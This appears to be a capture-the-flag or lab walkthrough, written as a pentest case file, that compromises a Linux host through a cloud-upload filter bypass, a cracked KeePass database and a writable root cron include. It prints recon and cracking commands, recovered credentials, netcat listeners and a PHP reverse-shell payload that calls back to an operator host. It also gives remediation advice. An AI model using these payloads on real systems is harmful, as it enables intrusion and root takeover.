Cloud upload RCE, KeePass crack, and cron include overwrite
Intermediate Linux engagement: extension-bypass PHP upload via a cloud UI yielded www-data; KeePass cracking recovered sysadmin SSH; a root cron include of backup.inc.php completed privilege escalation.
- Case files
- Cloud upload RCE, KeePass crack, and cron include overwrite
An upload feature that fetched remote URLs accepted a PHP shell behind a #.png bypass. KeePass under /opt unlocked SSH as sysadmin. Root cron included a writable PHP library we replaced with a reverse shell.
dirsearch found /cloud/. Hosting a PHP reverse shell and uploading via http://attacker/shell.php#.png executed as www-data.
Exfiltrated dataset.kdbx, cracked the master password, and authenticated as sysadmin with the stored SSH secret.
Replaced ~/scripts/lib/backup.inc.php with a reverse shell; root cron inclusion completed the engagement.
Engagement summary
An upload feature that fetched remote URLs accepted a PHP shell behind a #.png bypass. KeePass under /opt unlocked SSH as sysadmin. Root cron included a writable PHP library we replaced with a reverse shell.
Against OPACITY (10.49.167.120), Apache hosted /cloud/ — a personal-cloud upload that retrieved attacker-supplied URLs. Appending #.png bypassed the image filter while the server still executed the PHP body, giving a www-data reverse shell. LinPEAS highlighted /opt/dataset.kdbx; keepass2john and John recovered master password 741852963, which held sysadmin / Cl0udP4ss40p4city#8700 for SSH. Under sysadmin, ~/scripts/script.php included lib/backup.inc.php on a root schedule. Overwriting that include with a PHP reverse shell returned root when cron fired.
Business impact
URL-fetch uploads with weak extension checks are RCE. Password databases left on disk with weak masters expose SSH. Root cron that includes user-writable PHP is intentional privilege escalation. Validate content-type and extension server-side, encrypt KeePass with strong masters off the host, and never include writable libraries from privileged jobs.
Cloud upload filter bypass
dirsearch found /cloud/. Hosting a PHP reverse shell and uploading via http://attacker/shell.php#.png executed as www-data.
OPERATOR · RECON
savvy@lab:~$ nmap -sV 10.49.167.120
22/tcp open ssh OpenSSH 8.2p1
80/tcp open http Apache httpd 2.4.41
savvy@lab:~$ dirsearch -u http://10.49.167.120
/cloud/ /login.php
OPERATOR · UPLOAD RCE
savvy@lab:~$ python3 -m http.server 8000
# /cloud UI URL field: http://OPERATOR:8000/shell.php#.png
savvy@lab:~$ nc -lnvp 4444
savvy@lab:~$ curl 'http://10.49.167.120/cloud/images/shell.php'
savvy@lab:/var/www/html$
KeePass to sysadmin SSH
Exfiltrated dataset.kdbx, cracked the master password, and authenticated as sysadmin with the stored SSH secret.
OPERATOR · KEEPASS
savvy@lab:~$ keepass2john dataset.kdbx > hash.txt
savvy@lab:~$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
741852963 (dataset)
# KeePass entry → sysadmin / Cl0udP4ss40p4city#8700
savvy@lab:~$ ssh sysadmin@10.49.167.120
savvy@lab:~$
Cron PHP include to root
Replaced ~/scripts/lib/backup.inc.php with a reverse shell; root cron inclusion completed the engagement.
PAYLOAD
backup.inc.php
<?php
$sock = fsockopen("OPERATOR_IP", 5555);
exec("/bin/sh -i <&3 >&3 2>&3");
?>OPERATOR · ROOT
savvy@lab:~$ cp backup.inc.php ~/scripts/lib/backup.inc.php
savvy@lab:~$ nc -lnvp 5555
savvy@lab:~#
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Serve uploads from a non-executable store; reject double extensions and fragment tricks. Keep secrets vaults off web hosts. Make cron includes root-owned immutable files only.